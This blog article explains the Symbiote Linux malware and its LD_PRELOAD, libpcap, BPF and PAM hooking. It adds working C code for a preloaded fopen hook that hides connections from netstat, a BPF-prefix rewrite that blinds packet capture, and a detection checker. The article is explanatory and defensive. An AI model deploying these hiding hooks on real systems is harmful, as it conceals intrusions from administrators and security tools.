Symbiote: A Nearly Undetectable Linux Malware

A Stealthy Malware Triumphing In The New Era Of Cyber Threats

Vignesh RS
Geek Culture
Jun 29, 2022

Regular PC users have to worry about trojans, phishing scams and the like, but organizations in the financial sector are facing a different sort of threat. It is called Symbiote, a Linux-based malware that has been used specifically against financial institutions. What makes it scarier is that the researchers who analysed it say it is almost impossible to detect from the infected machine itself.

According to the BlackBerry Research blog post, the malware was first detected in November 2021. Unlike most Linux malware, Symbiote is not a standalone executable that runs as its own process: it is a shared library that gets loaded into the processes already running on the machine and does its work from inside them.

Symbiote hides by hooking libc and libpcap functions: every process that loads the library gets the malware's versions of those functions instead of the real ones, and the hooked versions filter out anything that would reveal the malware's files, processes or traffic to the operating system's own tools. The malware talks to several command-and-control (C2) servers, reached over different ports and protocols.

Symbiote malware uses shared object libraries (SOs)

Symbiote is a system-wide infection: because every dynamically linked process loads it, it hides from administrators, root included, just as well as from ordinary users. The same hooks lie to host-based antivirus and other security tools that rely on the hooked library calls, which is how it stays off their radar.

The malware is loaded through LD_PRELOAD. LD_PRELOAD is not a directive inside the malware but an environment variable (with a system-wide equivalent, the file /etc/ld.so.preload) that tells the dynamic loader to map the named shared objects into a process before any other library. Symbiote uses it to put its own definitions of security-relevant functions ahead of the real ones.

Because a preloaded shared object is mapped first, its symbols win symbol resolution: when a program calls readdir, fopen or a libpcap routine, the loader binds the call to Symbiote's copy rather than to libc's or libpcap's. This applies to every dynamically linked program on the host, including the ones antivirus products and administrators use.

The library's file name is chosen to look legitimate; one observed name resembled libc6-dbg, a real Debian package, so an administrator who sees it in a listing has no reason to be suspicious. Most of the time nobody sees it at all: the malware also hooks readdir and readdir64 and drops its own files from directory listings, so antivirus products that walk the file system through those calls never encounter it.

Dynamic Linker Hijacking

The technique Symbiote relies on is called Dynamic Linker Hijacking. The dynamic linker (ld.so) is the part of the system that runs at process start, maps the shared libraries an executable needs into its address space and resolves the function names the program calls to addresses inside those libraries. Symbiote hijacks that step: by placing its shared object on the preload list, it gets mapped into every new dynamically linked process before libc, and when the loader resolves a symbol such as readdir, fopen or pcap_loop it finds Symbiote's copy first. No vulnerability in the target program is needed and nothing is written into the loader's cache; a perfectly legitimate process ends up executing malicious code simply because that is the library the loader handed it.

Symbiote is capable of masking network activity

The first method hooks fopen and fopen64. Tools such as netstat read the kernel's connection tables from files like /proc/net/tcp and /proc/net/udp. When a process opens one of those files, the hook opens the real file, copies it to a temporary file minus the rows whose ports are on the malware's list, and hands the caller the filtered copy. The host-based tool therefore reports every connection except the attacker's, and the researcher reading its output has no indication that anything was removed.
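As an added example (not Symbiote's own code, and not from the BlackBerry post), here is a minimal shared object that does what this paragraph and the LD_PRELOAD section above describe: once preloaded, it intercepts fopen and fopen64, and for the /proc/net connection tables it returns an unlinked temporary file from which the rows for a hidden port have been removed. The port (4444), the file name hidenet.c and the list of tables are assumptions made for the example.

```c
/* Added example, not Symbiote's code: an LD_PRELOAD shared object that hooks
 * fopen/fopen64 and hands callers a filtered copy of the kernel's /proc/net
 * connection tables. Build and try it on a host with net-tools netstat:
 *   gcc -shared -fPIC -o hidenet.so hidenet.c      (add -ldl on glibc < 2.34)
 *   LD_PRELOAD=./hidenet.so netstat -tan           (connections on port 4444 vanish)
 * A statically linked netstat, or reading the file from a rescue system, is
 * not affected: no dynamic loader runs, so nothing is preloaded.
 * Port 4444 is a constructed value for this example. */
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <dlfcn.h>

#ifndef RTLD_NEXT
#define RTLD_NEXT ((void *) -1l)   /* glibc/musl value, in case _GNU_SOURCE came too late */
#endif

static const unsigned hidden_ports[] = { 4444 };
#define N_HIDDEN (sizeof hidden_ports / sizeof hidden_ports[0])

static const char *hidden_tables[] = {
    "/proc/net/tcp", "/proc/net/tcp6", "/proc/net/udp", "/proc/net/udp6", NULL };

int is_hidden_table(const char *path)
{
    for (size_t i = 0; hidden_tables[i]; i++)
        if (strcmp(path, hidden_tables[i]) == 0) return 1;
    return 0;
}

/* A row looks like "   1: 0100007F:115C 0A00000A:01BB 01 ..." with addresses
 * and ports in hex. Returns 1 if either port is hidden; the header row and
 * anything that does not parse are passed through untouched. */
int line_has_hidden_port(const char *row)
{
    unsigned lport, rport;
    if (sscanf(row, " %*d: %*[0-9A-Fa-f]:%x %*[0-9A-Fa-f]:%x", &lport, &rport) != 2)
        return 0;
    for (size_t i = 0; i < N_HIDDEN; i++)
        if (lport == hidden_ports[i] || rport == hidden_ports[i]) return 1;
    return 0;
}

/* Copies src to dst (capacity cap) without the hidden rows and returns how
 * many rows were dropped: the hook's logic, callable without the hook. */
size_t filter_table(const char *src, char *dst, size_t cap)
{
    size_t dropped = 0, used = 0;
    if (cap) dst[0] = '\0';
    while (*src) {
        const char *nl = strchr(src, '\n');
        size_t len = nl ? (size_t)(nl - src) + 1 : strlen(src);
        char row[512];
        size_t n = len < sizeof row - 1 ? len : sizeof row - 1;
        memcpy(row, src, n); row[n] = '\0';
        if (line_has_hidden_port(row)) dropped++;
        else if (used + len < cap) { memcpy(dst + used, src, len); used += len; dst[used] = '\0'; }
        src += len;
    }
    return dropped;
}

/* Interposed fopen: because this object is preloaded, the loader binds the
 * caller's fopen here; the real one is reached through RTLD_NEXT. */
FILE *fopen(const char *path, const char *mode)
{
    static FILE *(*real_fopen)(const char *, const char *);
    if (!real_fopen)
        real_fopen = (FILE *(*)(const char *, const char *)) dlsym(RTLD_NEXT, "fopen");
    FILE *real = real_fopen(path, mode);
    if (!real || !is_hidden_table(path)) return real;  /* everything else passes through */
    FILE *shadow = tmpfile();                          /* unlinked: leaves nothing to find */
    if (!shadow) return real;
    char row[512];
    while (fgets(row, sizeof row, real))
        if (!line_has_hidden_port(row)) fputs(row, shadow);
    fclose(real);
    rewind(shadow);
    return shadow;                                     /* caller reads the doctored table */
}

#ifndef fopen64   /* musl makes fopen64 a macro for fopen; glibc has a separate symbol */
FILE *fopen64(const char *path, const char *mode) { return fopen(path, mode); }
#endif
```

The point to notice is how little the hook has to do: it never touches the kernel, it only edits the bytes on their way to the caller, and the temporary file is unlinked so there is no artifact on disk to find afterwards.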

The second method targets packet-capture tools and works by seizing the packet-filter bytecode they install. When tcpdump or another libpcap user attaches a filter to its capture socket, libpcap compiles the filter expression into classic BPF bytecode and passes it to the kernel with setsockopt(SO_ATTACH_FILTER); the kernel then runs that program on every packet and copies only the matches up to the tool. This is the original, classic BPF, not the newer eBPF, and it runs in the kernel, not in user space; sk_buff is the kernel's packet structure, not a process. Symbiote hooks the call that installs the filter and adds its own instructions ahead of the analyst's, so packets to or from its ports are rejected before the original filter is even consulted. The capture looks complete and the analyst sees only the legitimate traffic of other applications.

Third, the malware hooks libpcap itself: pcap_loop, which delivers captured packets to the application's callback, and pcap_stats, which reports packet counts. UDP traffic to the domain names on its list is dropped before the callback sees it, and the statistics are adjusted so the counts do not reveal that anything is missing.

The BPF (Berkeley Packet Filter) hooking technique

BPF is sometimes described as a tool for bypassing sandboxes or as a way of creating virtual network interfaces, but that is not what it is. The Berkeley Packet Filter is a small virtual machine inside the kernel: a capture tool describes, in a handful of load, compare, jump and return instructions, which packets it wants, and the kernel runs that program against every packet on the socket and copies only the matches to user space. It exists so that tcpdump does not have to receive and discard the entire traffic stream itself; running tcpdump -d with a filter expression prints the program it compiles.

On Linux the program is attached to the capture socket with setsockopt(SO_ATTACH_FILTER); there is no "bpf0" device, the /dev/bpf* devices are the BSD interface to the same idea. Each instruction loads bytes from the packet into an accumulator, compares, jumps forward a fixed number of instructions, or returns the number of bytes to accept, where returning 0 drops the packet. Two properties make the program easy to hijack from user space: it is built by the tool (libpcap) before the kernel ever sees it, so a hooked function can rewrite it in transit, and its jumps are relative and forward-only, so a block placed in front of the original keeps the original working unchanged. Symbiote's added rules return 0 for its own traffic and otherwise fall through into the analyst's instructions.

BPF was designed for filtering and traffic analysis, but a mechanism that gets to inspect every packet serves attackers as well as defenders. Malware has used BPF programs to sniff traffic for credentials and session tokens sent over unencrypted protocols and, as here, to blind the defender's own capture.
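As an added example (not Symbiote's code), the rewrite described in the two paragraphs above, carried out on a real classic BPF program. The victim program is a simplified version of what tcpdump compiles for the expression "tcp" on IPv4; the hook prepends twelve instructions that return 0 for frames whose TCP source or destination port equals a hidden port and otherwise fall through into the original. A small interpreter covering only the opcodes used here runs both programs on a constructed frame. The opcode values and instruction layout are the classic BPF encodings from the Linux headers; the hidden port 4444 is a constructed value.

```c
/* Added example, not Symbiote's code: how a hook on the call that installs a
 * capture filter can prepend its own classic BPF rules. The tool compiles its
 * expression to cBPF and installs it with setsockopt(SO_ATTACH_FILTER); the
 * hook hands the kernel a longer program instead. Opcode values are the
 * <linux/filter.h> encodings and the struct mirrors struct sock_filter. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

struct cbpf_insn { uint16_t code; uint8_t jt; uint8_t jf; uint32_t k; };

#define LDH_ABS  0x28 /* A = pkt[k..k+1]          */
#define LDB_ABS  0x30 /* A = pkt[k]               */
#define LDXB_MSH 0xb1 /* X = (pkt[k] & 0xf) * 4   */
#define LDH_IND  0x48 /* A = pkt[X+k..X+k+1]      */
#define JEQ_K    0x15 /* pc += A == k ? jt : jf   */
#define JSET_K   0x45 /* pc += A & k ? jt : jf    */
#define RET_K    0x06 /* accept k bytes, 0 = drop */

/* The analyst's filter: "tcp" on IPv4, as tcpdump compiles it, simplified. */
const struct cbpf_insn victim_prog[] = {
    { LDH_ABS, 0, 0, 12 },     /* 0: ethertype       */
    { JEQ_K,   0, 3, 0x0800 }, /* 1: IPv4? else -> 5 */
    { LDB_ABS, 0, 0, 23 },     /* 2: IP protocol     */
    { JEQ_K,   0, 1, 6 },      /* 3: TCP?  else -> 5 */
    { RET_K,   0, 0, 65535 },  /* 4: accept          */
    { RET_K,   0, 0, 0 },      /* 5: drop            */
};
const size_t victim_len = sizeof victim_prog / sizeof victim_prog[0];

#define PREFIX_LEN 12
#define TO_ORIG(i) ((uint8_t)(PREFIX_LEN - (i) - 1)) /* jump from prefix slot i to the original */

/* cBPF jumps are relative and forward-only, so the original is appended
 * unchanged and can never branch back into the prefix. Returns 0 if out is too small. */
size_t build_hiding_program(const struct cbpf_insn *orig, size_t orig_len,
                            uint16_t port, struct cbpf_insn *out, size_t cap)
{
    if (cap < PREFIX_LEN + orig_len) return 0;
    const struct cbpf_insn prefix[PREFIX_LEN] = {
        { LDH_ABS,  0, 0,           12 },
        { JEQ_K,    0, TO_ORIG(1),  0x0800 }, /* not IPv4: original decides   */
        { LDB_ABS,  0, 0,           23 },
        { JEQ_K,    0, TO_ORIG(3),  6 },      /* not TCP: original decides    */
        { LDH_ABS,  0, 0,           20 },
        { JSET_K,   TO_ORIG(5), 0,  0x1fff }, /* fragment: no ports to read   */
        { LDXB_MSH, 0, 0,           14 },     /* X = IPv4 header length       */
        { LDH_IND,  0, 0,           14 },     /* source port                  */
        { JEQ_K,    2, 0,           port },   /* hidden? -> slot 11           */
        { LDH_IND,  0, 0,           16 },     /* destination port             */
        { JEQ_K,    0, TO_ORIG(10), port },   /* hidden? -> 11, else original */
        { RET_K,    0, 0,           0 },      /* 11: drop, tool never sees it */
    };
    memcpy(out, prefix, sizeof prefix);
    memcpy(out + PREFIX_LEN, orig, orig_len * sizeof *orig);
    return PREFIX_LEN + orig_len;
}

/* Interpreter for the subset above; out-of-range loads drop, as in the kernel. */
uint32_t cbpf_run(const struct cbpf_insn *p, size_t len, const uint8_t *pkt, size_t plen)
{
    uint32_t A = 0, X = 0, o;
    for (size_t pc = 0; pc < len; pc++) {
        const struct cbpf_insn *in = &p[pc];
        switch (in->code) {
        case LDH_ABS:  o = in->k;     if (o + 2 > plen) return 0; A = pkt[o] << 8 | pkt[o + 1]; break;
        case LDB_ABS:  o = in->k;     if (o + 1 > plen) return 0; A = pkt[o];                   break;
        case LDXB_MSH: o = in->k;     if (o + 1 > plen) return 0; X = (pkt[o] & 0xf) * 4;       break;
        case LDH_IND:  o = X + in->k; if (o + 2 > plen) return 0; A = pkt[o] << 8 | pkt[o + 1]; break;
        case JEQ_K:    pc += (A == in->k) ? in->jt : in->jf; break;
        case JSET_K:   pc += (A & in->k) ? in->jt : in->jf;  break;
        case RET_K:    return in->k;
        default:       return 0; /* opcode not modelled here */
        }
    }
    return 0;
}

/* Constructed frame: Ethernet, IPv4 (IHL 5, DF set), 20-byte TCP header, no payload. */
size_t make_tcp_frame(uint8_t *buf, uint16_t sport, uint16_t dport)
{
    static const uint8_t hdr[34] = { 0,0,0,0,0,1, 0,0,0,0,0,2, 0x08,0x00,
        0x45,0, 0,40, 0,0, 0x40,0, 64,6, 0,0, 10,0,0,1, 10,0,0,2 };
    memset(buf, 0, 54);
    memcpy(buf, hdr, sizeof hdr);
    buf[34] = sport >> 8; buf[35] = sport & 0xff;   /* TCP source port      */
    buf[36] = dport >> 8; buf[37] = dport & 0xff;   /* TCP destination port */
    buf[46] = 0x50; buf[47] = 0x02;                 /* data offset 5, SYN   */
    return 54;
}

uint32_t verdict(const struct cbpf_insn *prog, size_t len, uint16_t sport, uint16_t dport)
{
    uint8_t frame[54];
    size_t n = make_tcp_frame(frame, sport, dport);
    return cbpf_run(prog, len, frame, n);
}

/* The analyst's filter after the hook has prepended a rule for hidden_port. */
uint32_t hooked_verdict(uint16_t hidden_port, uint16_t sport, uint16_t dport)
{
    struct cbpf_insn prog[64];
    size_t n = build_hiding_program(victim_prog, victim_len, hidden_port, prog, 64);
    return verdict(prog, n, sport, dport);
}

int main(void)
{   /* prints: 65535 0 65535 */
    printf("%u %u %u\n", verdict(victim_prog, victim_len, 12345, 4444),
           hooked_verdict(4444, 12345, 4444), hooked_verdict(4444, 12345, 80));
    return 0;
}
```

The analyst's filter alone would have captured the connection to port 4444; the same filter with the prefix in front never returns it, while every other TCP packet is still accepted exactly as before. Nothing in tcpdump's output hints that the program it wrote is not the program the kernel is running.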

Attackers can access a Linux machine remotely by hooking a few Linux Pluggable Authentication Module (PAM) functions

Linux Pluggable Authentication Modules (PAM) is the library that services such as sshd, login and su call to verify a user's identity. It is extensible: the service asks PAM to authenticate, and PAM consults the modules configured for that service, so applications never implement password checking themselves.

Symbiote hooks a few PAM functions to give its operator remote access. When a service such as sshd calls the hooked function to authenticate a user, the hook compares the supplied password with a hard-coded one; if it matches, it reports success to the service, so the attacker can log in to any account without knowing that account's real password. A separate hook provides privilege escalation, letting the operator's process become root on demand.

No process hollowing or injection is involved, and nothing on disk changes beyond the library itself. The malicious code runs inside the legitimate sshd or login process that loaded it through the preload list, which is why file-based scanning and process listings show nothing out of the ordinary.

Detecting Symbiote

A hook can only deceive code that passes through it, and that is the lever for detection. On the network, anomalies show up in telemetry collected somewhere the malware cannot hook: a span port, a tap, NetFlow, or the logs of the resolver that answers the hosts' DNS queries, where the traffic to the domains the malware hides from local capture is visible. On the host, compare the view from the hooked tools with a view that bypasses the preload mechanism. Statically linked binaries (a static busybox, for instance) are untouched by LD_PRELOAD and /etc/ld.so.preload because no dynamic loader runs for them, and a rescue system or an offline disk image bypasses the hooks entirely. A directory listing, process list or /proc/net/tcp that differs between the two views, or a non-empty /etc/ld.so.preload, is the signature of an LD_PRELOAD rootkit. As a preventive best practice, the researchers also advise linking EDR with antivirus so both share what they see on each endpoint, with the caveat that both will be lied to if they depend on the hooked library calls of the infected host.
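An added example of the host-side comparison described above (my own checker, not tooling from the article or from the researchers): it parses /etc/ld.so.preload the way the glibc loader does, then scans every /proc/<pid>/maps for shared objects mapped from outside the distribution's library directories. It is meant to be compiled statically so that no preloaded object can hook the calls it makes. The trusted directory list is an assumption to adjust per distribution, and the sample inputs in the test are constructed.

```c
/* Added example, not Symbiote's or BlackBerry's code: a checker for the
 * LD_PRELOAD persistence the article describes. Build it statically so no
 * preloaded object can sit between it and the kernel:
 *   gcc -static -O2 -o preload-check preload-check.c && sudo ./preload-check
 * Run it from a rescue system or against a mounted image when you can.
 * The "trusted" directory list below is an assumption; adjust it. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <dirent.h>

#define MAX_ENTRIES 32
#define PATH_LEN    256

/* Tokenize /etc/ld.so.preload the way the glibc loader does: names separated
 * by whitespace or ':', '#' starts a comment. Returns the number of objects. */
int parse_ld_so_preload(const char *text, char out[][PATH_LEN], int max)
{
    int n = 0;
    for (const char *p = text; *p && n < max; ) {
        if (*p == '#') { while (*p && *p != '\n') p++; continue; }
        if (isspace((unsigned char)*p) || *p == ':') { p++; continue; }
        size_t len = 0;
        while (p[len] && !isspace((unsigned char)p[len]) && p[len] != ':' && p[len] != '#') len++;
        size_t keep = len < PATH_LEN - 1 ? len : PATH_LEN - 1;
        memcpy(out[n], p, keep); out[n][keep] = '\0'; n++;
        p += len;
    }
    return n;
}

static const char *trusted_prefixes[] = {
    "/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/libexec/", NULL };

static int trusted_path(const char *path)
{
    for (int i = 0; trusted_prefixes[i]; i++)
        if (strncmp(path, trusted_prefixes[i], strlen(trusted_prefixes[i])) == 0) return 1;
    return 0;
}

/* Scan the text of one /proc/<pid>/maps: collect the distinct shared objects
 * mapped from outside the trusted directories (a preloaded library has to live
 * somewhere, and it is mapped into every process). Returns the count. */
int suspicious_mappings(const char *maps, char out[][PATH_LEN], int max)
{
    int n = 0;
    for (const char *line = maps; *line && n < max; ) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        const char *slash = memchr(line, '/', len);   /* pathname field, if any */
        if (slash) {
            char path[PATH_LEN];
            size_t plen = len - (size_t)(slash - line);
            if (plen > PATH_LEN - 1) plen = PATH_LEN - 1;
            memcpy(path, slash, plen); path[plen] = '\0';
            int seen = 0;
            for (int i = 0; i < n; i++) if (strcmp(out[i], path) == 0) seen = 1;
            if (!seen && strstr(path, ".so") && !trusted_path(path)) strcpy(out[n++], path);
        }
        line += len + (nl ? 1 : 0);
    }
    return n;
}

static size_t read_file(const char *path, char *buf, size_t cap)
{
    FILE *f = fopen(path, "r");     /* safe here only because the binary is static */
    if (!f) return 0;
    size_t n = fread(buf, 1, cap - 1, f);
    fclose(f);
    buf[n] = '\0';
    return n;
}

int main(void)
{
    static char buf[1 << 20];
    char found[MAX_ENTRIES][PATH_LEN];
    if (read_file("/etc/ld.so.preload", buf, sizeof buf) > 0) {
        int n = parse_ld_so_preload(buf, found, MAX_ENTRIES);
        for (int i = 0; i < n; i++) printf("ld.so.preload: %s\n", found[i]);
    } else puts("ld.so.preload: absent or empty");
    DIR *proc = opendir("/proc");
    struct dirent *e;
    while (proc && (e = readdir(proc))) {
        if (!isdigit((unsigned char)e->d_name[0])) continue;
        char path[64];
        snprintf(path, sizeof path, "/proc/%s/maps", e->d_name);
        if (read_file(path, buf, sizeof buf) == 0) continue;
        int n = suspicious_mappings(buf, found, MAX_ENTRIES);
        for (int i = 0; i < n; i++) printf("pid %s maps %s\n", e->d_name, found[i]);
    }
    if (proc) closedir(proc);
    return 0;
}
```

Any object that shows up in the maps of nearly every process, or any entry at all in /etc/ld.so.preload, deserves an explanation; legitimate uses of the preload file exist but are rare and known to the administrators. Treat the output as a lead, not a verdict, and confirm it against an offline copy of the disk.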

Conclusion

While systems keep getting more secure, attackers keep finding new and innovative ways to compromise them, and Symbiote is a good example. It can be placed on virtually any Linux machine, gives its operator control of it, and is hard to detect because it hides its activity from the host's own tools rather than merely evading signatures.

The wide adoption of Linux in servers and cloud workloads means threats like this reach well beyond the financial sector. Detection, mitigation and response have to work even when the compromised host's own view cannot be trusted, because malware that executes inside every process can disrupt business operations long before anyone notices. Security professionals must plan for that and stay a step ahead of these evasion tactics.

A dev; loves talking about tech, marketing, productivity and business.